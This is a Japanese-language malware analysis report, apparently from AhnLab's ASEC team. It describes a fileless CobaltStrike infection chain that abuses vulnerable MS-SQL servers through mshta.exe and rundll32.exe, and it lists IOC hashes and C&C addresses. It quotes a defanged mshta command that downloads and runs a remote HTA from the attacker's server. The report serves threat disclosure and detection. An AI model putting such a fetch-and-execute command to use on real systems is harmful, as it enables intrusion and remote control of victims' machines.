2月23日、ASEC 分析チームは脆弱な MS-SQL サーバーによって CobaltStrike が拡散している情報を共有した。
https://asec.ahnlab.com/jp/32036/
今回の事例では、当時の配布方式とは異なるプロセスツリー構造を持つ形式の CobaltStrike を配布する状況を確認した。確認された配布方式は MS-SQL サーバー関連のプロセスである sqlservr.exe が脆弱性によって cmd.exe を実行するところまでは同じだが、その後 mshta.exe と rundll32.exe を利用してメモリ上でファイルレス形式で CobaltStrike を実行する点が異なっている。
攻撃者は MS-SQL の脆弱性によって実行された cmd.exe によって mshta.exe プロセスを実行した。mshta.exe は正常な Windows ユーティリティであり、Java スクリプト、Visual Basic スクリプトの実行および URL を直接渡して hta ファイルを実行する機能を行う。今回の事例の場合、URL を以下のように mshta プロセスの引数値として渡し、攻撃者サーバーから不正な hta ファイルをダウンロードして実行していた。
- mshta.exe http[:]//114.132.246[.]102:1222/bobo.png
ダウンロードされた hta は CobaltStrike のペイロード(Stager)が含まれた xsl スクリプトを攻撃者サーバーからダウンロードして実行する機能を行う。
この xsl スクリプトが実行されると、rundll32.exe に CobaltStrike(Stager)をインジェクションして実行する。その後 C&C サーバーからビーコンがダウンロードされ、様々な遠隔操作コマンドが実行できるようになる。
AhnLab V3 製品では、当該タイプに対して以下の通り検知している。
[IOC]
[hta スクリプト]
(MD5、検知名、エンジンバージョン)
– 591ec011ec21d1a3a05863e72910c55f (Downloader/JS.Agent) 2022.02.16.00
[xsl スクリプト]
(MD5、検知名、エンジンバージョン)
– dab62efb57014b0508fa1a8ff10b736a (Trojan/JS.Scriptinject.S1252) 2020.07.11.00
[C&C サーバー]
– 114.132.246[.]102
– hxxp://114.132.246[.]102:1222/bobo.png
– hxxp://114.132.246[.]102:1222/bobo.xsl
Categories:マルウェアの情報